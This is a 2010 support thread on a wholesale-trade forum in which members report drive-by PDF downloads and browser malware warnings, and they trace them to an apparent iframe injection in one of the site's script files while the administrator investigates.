1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
Dismiss Notice
Have you checked if your business appears in our directory? Add your basic information for FREE!

Click Here to know more!!

If you would like links to source leads, upgrade from £12.50 a month!

Click Here to subscribe!
Dismiss Notice

Hi Guest!

Our website stays online because of the support of our advertisers. A huge part of them are from banner ads that appear on our site. While some of them seems to be intrusive for some, these ads are needed to keep our community running and continue providing free membership service for buyers.

In light to this, we request that you disable ad blocking programs or add our website to your ad blocker's whitelist. This keeps us from offering our basic membership to everyone for free and help with maintenance costs of our website.

If you have already disabled ad blocking programs or added us into the whitelist, please ignore this message, this message will disappear in a few seconds!

Malware detected

Discussion in 'Forum Support & Feedback' started by RWA, Jun 26, 2010.

  1. Anthony

    Anthony

    Joined:
    Oct 17, 2004
    Messages:
    17,274
    Thanks for the report, guys.

    We're looking into this as a matter of urgency.

    I haven't been able to re-create the warning messages that you are currently seeing, but the screenshots are proving helpful as we try to investigate further.

    Update: Inspection of Google Webmaster Tools confirms no malmare detected. Possibly an external site or reference to a URL which is being flagged and not anything to do with our site. Either way, we must locate this reference if indeed that is the case and remove it.
  2. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    When I tried viewing this thread my browser just automatic downloaded a PDF again. I've just checked where it is comming from and it is:

    Replace DOT with a .
  3. Anthony

    Anthony

    Joined:
    Oct 17, 2004
    Messages:
    17,274
    I don't doubt that this is happening to you, although I must say that I have been unable to recreate any of the events depicted in this thread. I have no malware warnings and certainly no files being downloaded upon viewing the site. Our server technical support confirmed the same at their end, too.

    In the interests of self-preservation I think that it would be advisable to run a malmare scan, clear your cache, cookies and temporary Internet files and run a virus scan on your current PC. This should clear out anything that may be currently on your PC. After that, it would be good if you could return to the forum and see if it happens again. Please keep a note of exactly what happens as this can be used in our investigation. We must find the source and find it quick if indeed there is an exploit within the forum or via a reference URL.

    I would be interested to hear from anyone else who is experiencing these specific symptoms, i.e. files being downloaded.

    Thanks.
  4. Saajan

    Saajan

    Joined:
    Oct 30, 2005
    Messages:
    10,736
    Where is the PDF store?
  5. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    I will do that now. Although it only seems to be happening with this site :\.
  6. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    Sorry, I don't quite understand?
  7. Pete

    Pete

    Joined:
    May 30, 2005
    Messages:
    14,067
    No problems for me at this point.
  8. uhafmail

    uhafmail

    Joined:
    Aug 25, 2008
    Messages:
    6,468
    You have said that a PDF hhas been downloaded but downloaded to where? Obviously we know it is on your computer but where on the system.
  9. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    It just downloaded like a usual file would. It appeared at the bottom in the blue download bar which chrome has. It just saved to my normal downloads folder. myusername/Downloads/

    If you wish I can upload the files to somewhere for you? I tried opening them in VMWare (sandbox) incase they were infected. But it seems they can't even be opened and are corrupt.
  10. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    I'm not getting any warning in Chrome on my laptop but in Firefox I did notice the status bar saying 'Waiting for btomiumgop....', when I first went onto the site http://www.thewholesaleforums.co.uk/forum/ no reference in the page source to this.
  11. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
  12. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    Struggling to recreate the bt.....gop thing but I can recreate the source of the Chrome warning. I have to clear my cache to do this as it only appears on the first load and not subsequent pages, if the cache is cleared it does seen to appear on any page.

    Here is the HTTP requests when loading http://www.thewholesaleforums.co.uk/forum

    Looks like Firefox just blocks it without giving a warning
  13. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    Right, I just scanned my comp with 3 AV's. All comes out clean.

    I also just decided to try it in firefox and although no warning I did see this at the bottom( the btom thing).

    Link

    It also told me I needed to install a plugin when viewing the site, Its just a general acrobat plugin for FF however I have never used FF on this computer, so most of you probably allready have it installed.

    Link

    PS: Just asked a friend to check, it appeared for them too ( the thing in the first image). It seems to only happen the first time you come here. If I refresh now it doesnt appear?
  14. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    I would check REMOVED and compare it to a backup. It appears to contain javascript and is always the forum file above the openpwn request.
  15. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    Try it with the Firefox HttpFox plugin which monitors all the HTTP requests when loading the page. When it's open you need to click start then click the forum link to refresh the page, then stop it before clicking any other link
  16. PhoenixFalls

    PhoenixFalls Banned Member

    Joined:
    Feb 3, 2010
    Messages:
    24
    A PDF has just been automatically downloaded to my computer... goes to default download folder.

    A screenshot of browser window as it happened is attached. There is no PDF icon, because I currently have no software to open it.
  17. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    That's the same kind of file names the ones that got downloaded to me have. Also, if you look at the permissions of the PDF, it has permission to Write,Execute,Read & basicly do whatever it wants. I would delete it ASAP.
  18. game-tec

    game-tec

    Joined:
    Jul 11, 2009
    Messages:
    853
    Just checked, it seems that file is infected.

    Link

    However, It only does this once. Once I refresh that page, the harmful code has gone. Which would explain why the PDF only gets downloaded once.
  19. DeveloperMatt

    DeveloperMatt

    Joined:
    Jun 26, 2009
    Messages:
    1,306
    My message was aimed at Anthony, as you don't see the content of a php file on the client side.

    Looks like the file has had an iframe injection attack
  20. PhoenixFalls

    PhoenixFalls Banned Member

    Joined:
    Feb 3, 2010
    Messages:
    24

    That PHP file acts a Javascript one, what we see is the output of the PHP. It's requested on each page, though I don't know it's original intention. Now it directs the request to the same server where the PDFs are downloaded from.
Back to top

Share This Page